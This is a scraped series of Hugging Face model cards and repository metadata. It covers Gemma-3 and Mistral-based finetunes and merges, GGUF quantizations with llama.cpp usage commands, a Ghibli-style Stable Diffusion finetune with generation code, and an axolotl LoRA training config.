and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
reesu/Finetunedgemma-3
reesu
2025-05-30T07:18:04Z
34
0
transformers
[ "transformers", "safetensors", "gemma", "image-text-to-text", "text-generation-inference", "unsloth", "gemma3", "trl", "conversational", "en", "base_model:unsloth/gemma-3-4b-it-unsloth-bnb-4bit", "base_model:finetune:unsloth/gemma-3-4b-it-unsloth-bnb-4bit", "license:apache-2.0", "endpoints_compatible", "region:us" ]
image-text-to-text
2025-05-30T06:02:23Z
--- base_model: unsloth/gemma-3-4b-it-unsloth-bnb-4bit tags: - text-generation-inference - transformers - unsloth - gemma3 - trl license: apache-2.0 language: - en --- # Uploaded model - **Developed by:** reesu - **License:** apache-2.0 - **Finetuned from model :** unsloth/gemma-3-4b-it-unsloth-bnb-4bit This gemma3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
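No inference snippet accompanies this card; a minimal sketch for trying the checkpoint through the transformers `image-text-to-text` pipeline is given below. It assumes the repository ships a processor/config compatible with that pipeline, and the image URL is only a placeholder.

```python
# Minimal sketch, assuming the repo loads through the high-level pipeline API
# and that a GPU (or enough RAM) is available; the image URL is a placeholder.
from transformers import pipeline

pipe = pipeline(
    "image-text-to-text",
    model="reesu/Finetunedgemma-3",
    device_map="auto",
)

messages = [
    {
        "role": "user",
        "content": [
            {"type": "image", "url": "https://example.com/sample.jpg"},  # placeholder
            {"type": "text", "text": "Describe this image in one sentence."},
        ],
    }
]
print(pipe(text=messages, max_new_tokens=64))
```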
danhtran2mind/ghibli-fine-tuned-sd-2.1
danhtran2mind
2025-05-30T07:17:01Z
33
0
diffusers
[ "diffusers", "tensorboard", "safetensors", "ghibli", "text2image", "text-to-image", "en", "dataset:uwunish/ghibli-dataset", "base_model:stabilityai/stable-diffusion-2-1-base", "base_model:finetune:stabilityai/stable-diffusion-2-1-base", "license:mit", "autotrain_compatible", "endpoints_compatible", "diffusers:StableDiffusionPipeline", "region:us" ]
text-to-image
2025-04-19T03:51:57Z
--- license: mit datasets: - uwunish/ghibli-dataset language: - en base_model: - stabilityai/stable-diffusion-2-1-base pipeline_tag: text-to-image library_name: diffusers tags: - ghibli - text2image --- <div align="center"> <h1> Ghibli Fine-Tuned Stable Diffusion 2.1 </h1> </div> ## Dataset Available at: https://huggingface.co/datasets/uwunish/ghibli-dataset. ## Hyperparameters The fine-tuning process was optimized with the following hyperparameters: | Hyperparameter | Value | | --- | --- | | `learning_rate` | 1e-05 | | `num_train_epochs` | 40 | | `train_batch_size` | 2 | | `gradient_accumulation_steps` | 2 | | `mixed_precision` | "fp16" | | `resolution` | 512 | | `max_grad_norm` | 1 | | `lr_scheduler` | "constant" | | `lr_warmup_steps` | 0 | | `checkpoints_total_limit` | 1 | | `use_ema` | True | | `use_8bit_adam` | True | | `center_crop` | True | | `random_flip` | True | | `gradient_checkpointing` | True | These parameters were carefully selected to balance training efficiency and model performance, leveraging techniques like mixed precision and gradient checkpointing. ## Metrics The fine-tuning process achieved a final loss of **0.0345**, indicating excellent convergence and high fidelity to the Ghibli art style. ## Usage ### Step 1: Import Required Libraries Begin by importing the necessary libraries to power the image generation pipeline. ```python import torch from PIL import Image import numpy as np from transformers import CLIPTextModel, CLIPTokenizer from diffusers import AutoencoderKL, UNet2DConditionModel, PNDMScheduler from tqdm import tqdm ``` ### Step 2: Configure the Model Set up the device, data type, and load the pre-trained Ghibli-fine-tuned Stable Diffusion model. ```python # Configure device and data type device = torch.device("cuda" if torch.cuda.is_available() else "cpu") dtype = torch.float16 if torch.cuda.is_available() else torch.float32 # Model path model_name = "danhtran2mind/ghibli-fine-tuned-sd-2.1" # Load model components vae = AutoencoderKL.from_pretrained(model_name, subfolder="vae", torch_dtype=dtype).to(device) tokenizer = CLIPTokenizer.from_pretrained(model_name, subfolder="tokenizer") text_encoder = CLIPTextModel.from_pretrained(model_name, subfolder="text_encoder", torch_dtype=dtype).to(device) unet = UNet2DConditionModel.from_pretrained(model_name, subfolder="unet", torch_dtype=dtype).to(device) scheduler = PNDMScheduler.from_pretrained(model_name, subfolder="scheduler") ``` ### Step 3: Define the Image Generation Function Use the following function to generate Ghibli-style images based on your text prompts.
```python def generate_image(prompt, height=512, width=512, num_inference_steps=50, guidance_scale=3.5, seed=42): """Generate a Ghibli-style image from a text prompt.""" # Set random seed for reproducibility generator = torch.Generator(device=device).manual_seed(int(seed)) # Tokenize and encode the prompt text_input = tokenizer( [prompt], padding="max_length", max_length=tokenizer.model_max_length, truncation=True, return_tensors="pt" ) with torch.no_grad(): text_embeddings = text_encoder(text_input.input_ids.to(device))[0].to(dtype=dtype) # Encode an empty prompt for classifier-free guidance uncond_input = tokenizer( [""], padding="max_length", max_length=text_input.input_ids.shape[-1], return_tensors="pt" ) with torch.no_grad(): uncond_embeddings = text_encoder(uncond_input.input_ids.to(device))[0].to(dtype=dtype) text_embeddings = torch.cat([uncond_embeddings, text_embeddings]) # Initialize latent representations latents = torch.randn( (1, unet.config.in_channels, height // 8, width // 8), generator=generator, dtype=dtype, device=device ) # Configure scheduler timesteps scheduler.set_timesteps(num_inference_steps) latents = latents * scheduler.init_noise_sigma # Denoising loop for t in tqdm(scheduler.timesteps, desc="Generating image"): latent_model_input = torch.cat([latents] * 2) latent_model_input = scheduler.scale_model_input(latent_model_input, t) with torch.no_grad(): if device.type == "cuda": with torch.autocast(device_type="cuda", dtype=torch.float16): noise_pred = unet(latent_model_input, t, encoder_hidden_states=text_embeddings).sample else: noise_pred = unet(latent_model_input, t, encoder_hidden_states=text_embeddings).sample # Apply classifier-free guidance noise_pred_uncond, noise_pred_text = noise_pred.chunk(2) noise_pred = noise_pred_uncond + guidance_scale * (noise_pred_text - noise_pred_uncond) latents = scheduler.step(noise_pred, t, latents).prev_sample # Decode latents to image with torch.no_grad(): latents = latents / vae.config.scaling_factor image = vae.decode(latents).sample # Convert to PIL Image image = (image / 2 + 0.5).clamp(0, 1) image = image.detach().cpu().permute(0, 2, 3, 1).numpy() image = (image * 255).round().astype("uint8") return Image.fromarray(image[0]) ``` ### Step 4: Generate Your Image Craft a vivid prompt and generate your Ghibli-style masterpiece. ```python # Example prompt prompt = "a serene landscape in Ghibli style" # Generate the image image = generate_image( prompt=prompt, height=512, width=512, num_inference_steps=50, guidance_scale=3.5, seed=42 ) # Display or save the image image.show() # Or image.save("ghibli_landscape.png") ``` ## Environment The project was developed and tested in the following environment: - **Python Version**: 3.11.11 - **Dependencies**: | Library | Version | | --- | --- | | huggingface-hub | 0.30.2 | | accelerate | 1.3.0 | | bitsandbytes | 0.45.5 | | torch | 2.5.1 | | Pillow | 11.1.0 | | numpy | 1.26.4 | | transformers | 4.51.1 | | torchvision | 0.20.1 | | diffusers | 0.33.1 | | gradio | Latest | Ensure your environment matches these specifications to avoid compatibility issues.
pot99rta/BMO-CaptianMaid-12B-GGUF
pot99rta
2025-05-30T07:16:15Z
5
0
transformers
[ "transformers", "gguf", "mergekit", "merge", "llama-cpp", "gguf-my-repo", "base_model:pot99rta/BMO-CaptianMaid-12B", "base_model:quantized:pot99rta/BMO-CaptianMaid-12B", "endpoints_compatible", "region:us", "conversational" ]
null
2025-05-29T23:38:19Z
--- base_model: pot99rta/BMO-CaptianMaid-12B library_name: transformers tags: - mergekit - merge - llama-cpp - gguf-my-repo --- # BMO-CaptianMaid-12B-GGUF ![image/png](https://cdn-uploads.huggingface.co/production/uploads/636ea389fd9751c3d081e88e/HtM8KBr6PZHVg5iiAJSkN.png) ```Models Merged:``` ```1. Nitral-AI/Captain_BMO-12B``` ```2. pot99rta/CaptainMaid-12B-VioletMell-V0.420``` ```Preset:``` ```Use ChatML or Mistral - Phi works too for some unknown reason.``` Phi and Mistral work with interesting results. I quite like it with my settings. This model was converted to GGUF format from [`pot99rta/BMO-CaptianMaid-12B`](https://huggingface.co/pot99rta/BMO-CaptianMaid-12B) using llama.cpp via ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space. Refer to the [original model card](https://huggingface.co/pot99rta/BMO-CaptianMaid-12B) for more details on the model. ## Use with llama.cpp Install llama.cpp through brew (works on Mac and Linux) ```bash brew install llama.cpp ``` Invoke the llama.cpp server or the CLI. ### CLI: ```bash llama-cli --hf-repo pot99rta/BMO-CaptianMaid-12B-Q8_0-GGUF --hf-file bmo-captianmaid-12b-q8_0.gguf -p "The meaning to life and the universe is" ``` ### Server: ```bash llama-server --hf-repo pot99rta/BMO-CaptianMaid-12B-Q8_0-GGUF --hf-file bmo-captianmaid-12b-q8_0.gguf -c 2048 ``` Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo. Step 1: Clone llama.cpp from GitHub. ``` git clone https://github.com/ggerganov/llama.cpp ``` Step 2: Move into the llama.cpp folder and build it with the `LLAMA_CURL=1` flag along with other hardware-specific flags (for example, LLAMA_CUDA=1 for Nvidia GPUs on Linux). ``` cd llama.cpp && LLAMA_CURL=1 make ``` Step 3: Run inference through the main binary. ``` ./llama-cli --hf-repo pot99rta/BMO-CaptianMaid-12B-Q8_0-GGUF --hf-file bmo-captianmaid-12b-q8_0.gguf -p "The meaning to life and the universe is" ``` or ``` ./llama-server --hf-repo pot99rta/BMO-CaptianMaid-12B-Q8_0-GGUF --hf-file bmo-captianmaid-12b-q8_0.gguf -c 2048 ```
pot99rta/BMO-CaptianMaid-12B
pot99rta
2025-05-30T07:15:55Z
10
0
transformers
[ "transformers", "safetensors", "mistral", "text-generation", "mergekit", "merge", "conversational", "arxiv:2306.01708", "base_model:Nitral-AI/Captain_BMO-12B", "base_model:merge:Nitral-AI/Captain_BMO-12B", "base_model:pot99rta/CaptainMaid-12B-VioletMell-V0.420", "base_model:merge:pot99rta/CaptainMaid-12B-VioletMell-V0.420", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-05-29T20:31:19Z
--- base_model: - Nitral-AI/Captain_BMO-12B - pot99rta/CaptainMaid-12B-VioletMell-V0.420 library_name: transformers tags: - mergekit - merge --- # BMO-CaptianMaid-12B ![image/png](https://cdn-uploads.huggingface.co/production/uploads/636ea389fd9751c3d081e88e/bRUq0aF5mcJXmTVgeqeI8.png) ```Models Merged:``` ```1. Nitral-AI/Captain_BMO-12B``` ```2. pot99rta/CaptainMaid-12B-VioletMell-V0.420``` ```Preset:``` ```Use ChatML or Mistral - Phi works too for some unknown reason.``` Phi and Mistral work with interesting results. I quite like it with my settings. # merge This is a merge of pre-trained language models created using [mergekit](https://github.com/cg123/mergekit). ## Merge Details ### Merge Method This model was merged using the [TIES](https://arxiv.org/abs/2306.01708) merge method using [pot99rta/CaptainMaid-12B-VioletMell-V0.420](https://huggingface.co/pot99rta/CaptainMaid-12B-VioletMell-V0.420) as a base. ### Models Merged The following models were included in the merge: * [Nitral-AI/Captain_BMO-12B](https://huggingface.co/Nitral-AI/Captain_BMO-12B) ### Configuration The following YAML configuration was used to produce this model: ```yaml models: - model: pot99rta/CaptainMaid-12B-VioletMell-V0.420 #no parameters necessary for base model - model: pot99rta/CaptainMaid-12B-VioletMell-V0.420 parameters: density: 0.5 weight: 0.5 - model: Nitral-AI/Captain_BMO-12B parameters: density: 0.5 weight: 0.5 merge_method: ties base_model: pot99rta/CaptainMaid-12B-VioletMell-V0.420 parameters: normalize: false int8_mask: true dtype: float16 ```
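The card documents the merge recipe but not how to run the result; a minimal generation sketch follows. It assumes the bundled tokenizer ships a ChatML/Mistral chat template (per the preset note above) and that enough GPU memory is available for a 12B model in fp16.

```python
# Minimal usage sketch for the merged model -- not an official example from the card.
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

model_id = "pot99rta/BMO-CaptianMaid-12B"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(
    model_id, torch_dtype=torch.float16, device_map="auto"
)

# Assumes the tokenizer carries a chat template (ChatML or Mistral, per the card).
messages = [{"role": "user", "content": "Introduce yourself in two sentences."}]
inputs = tokenizer.apply_chat_template(
    messages, add_generation_prompt=True, return_tensors="pt"
).to(model.device)
output = model.generate(inputs, max_new_tokens=128)
print(tokenizer.decode(output[0][inputs.shape[-1]:], skip_special_tokens=True))
```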
DevQuasar/huihui-ai.AceReason-Nemotron-14B-abliterated-GGUF
DevQuasar
2025-05-30T07:14:33Z
8
0
null
[ "gguf", "text-generation", "base_model:huihui-ai/AceReason-Nemotron-14B-abliterated", "base_model:quantized:huihui-ai/AceReason-Nemotron-14B-abliterated", "endpoints_compatible", "region:us", "conversational" ]
text-generation
2025-05-30T04:43:14Z
--- base_model: - huihui-ai/AceReason-Nemotron-14B-abliterated pipeline_tag: text-generation --- [<img src="https://raw.githubusercontent.com/csabakecskemeti/devquasar/main/dq_logo_black-transparent.png" width="200"/>](https://devquasar.com) Quantized version of: [huihui-ai/AceReason-Nemotron-14B-abliterated](https://huggingface.co/huihui-ai/AceReason-Nemotron-14B-abliterated) 'Make knowledge free for everyone' <p align="center"> Made with <br> <a href="https://www.civo.com/" target="_blank"> <img src="https://www.civo.com/assets/public/brand-assets/civo-logo-colour-60cc1622dedf346f7afde1fff760523f731b0aac106a5465af98ff4073114b74.svg" width="100"/> </a> </p> <a href='https://ko-fi.com/L4L416YX7C' target='_blank'><img height='36' style='border:0px;height:36px;' src='https://storage.ko-fi.com/cdn/kofi6.png?v=6' border='0' alt='Buy Me a Coffee at ko-fi.com' /></a>
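The card links the original model but gives no loading example; one possible sketch with llama-cpp-python is below. The filename glob is an assumption -- check the repository's file list for the quantization level you actually want.

```python
# Sketch only: pulls one quantized file from the repo and runs a chat completion.
# Requires `pip install llama-cpp-python huggingface-hub`; the filename pattern is assumed.
from llama_cpp import Llama

llm = Llama.from_pretrained(
    repo_id="DevQuasar/huihui-ai.AceReason-Nemotron-14B-abliterated-GGUF",
    filename="*Q4_K_M.gguf",  # assumed pattern; pick the quant that fits your hardware
    n_ctx=4096,
)
out = llm.create_chat_completion(
    messages=[{"role": "user", "content": "State the Pythagorean theorem."}]
)
print(out["choices"][0]["message"]["content"])
```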
pot99rta/PatriMaidV2-12B
pot99rta
2025-05-30T07:12:00Z
8
0
transformers
[ "transformers", "safetensors", "mistral", "text-generation", "mergekit", "merge", "arxiv:2306.01708", "base_model:PocketDoc/Dans-PersonalityEngine-V1.3.0-12b", "base_model:merge:PocketDoc/Dans-PersonalityEngine-V1.3.0-12b", "base_model:pot99rta/PatriMaid-12B-Forgottenslop-NeonMell", "base_model:merge:pot99rta/PatriMaid-12B-Forgottenslop-NeonMell", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-05-29T18:24:09Z
--- base_model: - PocketDoc/Dans-PersonalityEngine-V1.3.0-12b - pot99rta/PatriMaid-12B-Forgottenslop-NeonMell library_name: transformers tags: - mergekit - merge --- # PatriMaidV2-12B ![image/png](https://cdn-uploads.huggingface.co/production/uploads/636ea389fd9751c3d081e88e/2dliTbOaFq4cihrCaKIEK.png) Neon Glow ```Models Merged:``` ```1. PocketDoc/Dans-PersonalityEngine-V1.3.0-12b``` ```2. pot99rta/PatriMaid-12B-Forgottenslop-NeonMell``` ```Preset:``` ```Use ChatML or Mistral - You can use Phi too!``` Since Dans-PersonalityEngine uses Phi as its preset template, the best mix is Phi and Mistral, for some weird reason. # merge This is a merge of pre-trained language models created using [mergekit](https://github.com/cg123/mergekit). ## Merge Details ### Merge Method This model was merged using the [TIES](https://arxiv.org/abs/2306.01708) merge method using [pot99rta/PatriMaid-12B-Forgottenslop-NeonMell](https://huggingface.co/pot99rta/PatriMaid-12B-Forgottenslop-NeonMell) as a base. ### Models Merged The following models were included in the merge: * [PocketDoc/Dans-PersonalityEngine-V1.3.0-12b](https://huggingface.co/PocketDoc/Dans-PersonalityEngine-V1.3.0-12b) ### Configuration The following YAML configuration was used to produce this model: ```yaml models: - model: pot99rta/PatriMaid-12B-Forgottenslop-NeonMell #no parameters necessary for base model - model: pot99rta/PatriMaid-12B-Forgottenslop-NeonMell parameters: density: 0.5 weight: 0.5 - model: PocketDoc/Dans-PersonalityEngine-V1.3.0-12b parameters: density: 0.5 weight: 0.5 merge_method: ties base_model: pot99rta/PatriMaid-12B-Forgottenslop-NeonMell parameters: normalize: false int8_mask: true dtype: float16 ```
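As with the merge above, the card stops at the merge configuration; a short sketch using the high-level text-generation pipeline might look like this (fp16 on a GPU with enough memory for a 12B model is assumed, and the prompt is only an illustration).

```python
# Minimal sketch via the text-generation pipeline; not an official example from the card.
import torch
from transformers import pipeline

generator = pipeline(
    "text-generation",
    model="pot99rta/PatriMaidV2-12B",
    torch_dtype=torch.float16,
    device_map="auto",
)
print(generator("Write a short greeting in character.", max_new_tokens=80)[0]["generated_text"])
```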
TOMFORD79/Tom7
TOMFORD79
2025-05-30T07:11:42Z
0
0
null
[ "safetensors", "any-to-any", "omega", "omegalabs", "bittensor", "agi", "license:mit", "region:us" ]
any-to-any
2025-05-30T06:16:05Z
--- license: mit tags: - any-to-any - omega - omegalabs - bittensor - agi --- This is an Any-to-Any model checkpoint for the OMEGA Labs x Bittensor Any-to-Any subnet. Check out the [git repo](https://github.com/omegalabsinc/omegalabs-anytoany-bittensor) and find OMEGA on X: [@omegalabsai](https://x.com/omegalabsai).
dimasik2987/47a9bfc3-f027-4ec0-88ad-186371beb371
dimasik2987
2025-05-30T07:08:51Z
0
0
peft
[ "peft", "safetensors", "mistral", "axolotl", "generated_from_trainer", "base_model:lcw99/zephykor-ko-7b-chang", "base_model:adapter:lcw99/zephykor-ko-7b-chang", "4-bit", "bitsandbytes", "region:us" ]
null
2025-05-30T06:27:20Z
--- library_name: peft base_model: lcw99/zephykor-ko-7b-chang tags: - axolotl - generated_from_trainer model-index: - name: 47a9bfc3-f027-4ec0-88ad-186371beb371 results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> [<img src="https://raw.githubusercontent.com/axolotl-ai-cloud/axolotl/main/image/axolotl-badge-web.png" alt="Built with Axolotl" width="200" height="32"/>](https://github.com/axolotl-ai-cloud/axolotl) <details><summary>See axolotl config</summary> axolotl version: `0.4.1` ```yaml absolute_data_files: false adapter: lora base_model: lcw99/zephykor-ko-7b-chang bf16: true chat_template: llama3 dataset_prepared_path: /workspace/axolotl datasets: - data_files: - 637230a02f06fb7e_train_data.json ds_type: json format: custom path: /workspace/input_data/ type: field_instruction: instruct field_output: output format: '{instruction}' no_input_format: '{instruction}' system_format: '{system}' system_prompt: '' debug: null deepspeed: null dpo: beta: 0.1 enabled: true group_by_length: false rank_loss: true reference_model: null early_stopping_patience: null eval_max_new_tokens: 128 eval_table_size: null evals_per_epoch: 1 flash_attention: true fp16: null fsdp: null fsdp_config: null gradient_accumulation_steps: 2 gradient_checkpointing: true gradient_clipping: 0.85 group_by_length: false hub_model_id: dimasik2987/47a9bfc3-f027-4ec0-88ad-186371beb371 hub_repo: null hub_strategy: end hub_token: null learning_rate: 5.0e-06 load_in_4bit: true load_in_8bit: false local_rank: null logging_steps: 1 lora_alpha: 128 lora_dropout: 0.1 lora_fan_in_fan_out: null lora_model_dir: null lora_r: 64 lora_target_linear: true lr_scheduler: cosine max_steps: 500 micro_batch_size: 12 mixed_precision: bf16 mlflow_experiment_name: /tmp/637230a02f06fb7e_train_data.json model_type: AutoModelForCausalLM num_epochs: 2 optimizer: adamw_bnb_8bit output_dir: miner_id_24 pad_to_sequence_len: true resume_from_checkpoint: null s2_attention: null sample_packing: false saves_per_epoch: 1 sequence_len: 1024 strict: false tf32: false tokenizer_type: AutoTokenizer train_on_inputs: false trust_remote_code: true val_set_size: 0.05 wandb_entity: null wandb_mode: online wandb_name: 914d7dca-b18c-4388-87c1-d8f0c83ec6ee wandb_project: s56-7 wandb_run: your_name wandb_runid: 914d7dca-b18c-4388-87c1-d8f0c83ec6ee warmup_steps: 50 weight_decay: 0.02 xformers_attention: true ``` </details><br> # 47a9bfc3-f027-4ec0-88ad-186371beb371 This model is a fine-tuned version of [lcw99/zephykor-ko-7b-chang](https://huggingface.co/lcw99/zephykor-ko-7b-chang) on the None dataset. 
It achieves the following results on the evaluation set: - Loss: 1.5184 ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 5e-06 - train_batch_size: 12 - eval_batch_size: 12 - seed: 42 - gradient_accumulation_steps: 2 - total_train_batch_size: 24 - optimizer: Use OptimizerNames.ADAMW_BNB with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: cosine - lr_scheduler_warmup_steps: 50 - training_steps: 500 ### Training results | Training Loss | Epoch | Step | Validation Loss | |:-------------:|:------:|:----:|:---------------:| | 6.1086 | 0.0002 | 1 | 3.6037 | | 2.464 | 0.0482 | 250 | 1.5579 | | 3.4586 | 0.0965 | 500 | 1.5184 | ### Framework versions - PEFT 0.13.2 - Transformers 4.46.0 - Pytorch 2.5.0+cu124 - Datasets 3.0.1 - Tokenizers 0.20.1
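The card records the axolotl configuration and training curve but no loading snippet; a minimal PEFT sketch is shown below. The prompt is only an illustration, and loading the base model in fp16 rather than 4-bit is a simplification of the training setup.

```python
# Sketch: attach the LoRA adapter to its base model with PEFT.
# trust_remote_code mirrors the axolotl config above; adjust dtype/device to your hardware.
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer
from peft import PeftModel

base_id = "lcw99/zephykor-ko-7b-chang"
adapter_id = "dimasik2987/47a9bfc3-f027-4ec0-88ad-186371beb371"

tokenizer = AutoTokenizer.from_pretrained(base_id, trust_remote_code=True)
base = AutoModelForCausalLM.from_pretrained(
    base_id, torch_dtype=torch.float16, device_map="auto", trust_remote_code=True
)
model = PeftModel.from_pretrained(base, adapter_id)

inputs = tokenizer("Hello, please introduce yourself.", return_tensors="pt").to(model.device)
print(tokenizer.decode(model.generate(**inputs, max_new_tokens=64)[0], skip_special_tokens=True))
```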
reesu/gemma-3-finetune
reesu
2025-05-30T07:07:12Z
4
0
transformers
[ "transformers", "safetensors", "gemma", "image-text-to-text", "text-generation-inference", "unsloth", "gemma3", "conversational", "en", "base_model:unsloth/gemma-3-4b-it-unsloth-bnb-4bit", "base_model:finetune:unsloth/gemma-3-4b-it-unsloth-bnb-4bit", "license:apache-2.0", "endpoints_compatible", "region:us" ]
image-text-to-text
2025-05-30T06:58:39Z
--- base_model: unsloth/gemma-3-4b-it-unsloth-bnb-4bit tags: - text-generation-inference - transformers - unsloth - gemma3 license: apache-2.0 language: - en --- # Uploaded finetuned model - **Developed by:** reesu - **License:** apache-2.0 - **Finetuned from model :** unsloth/gemma-3-4b-it-unsloth-bnb-4bit This gemma3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
KanManee/Qwen-3-4B-IncomeCode-Reasoning
KanManee
2025-05-30T07:01:03Z
0
0
transformers
[ "transformers", "safetensors", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-05-30T07:00:46Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]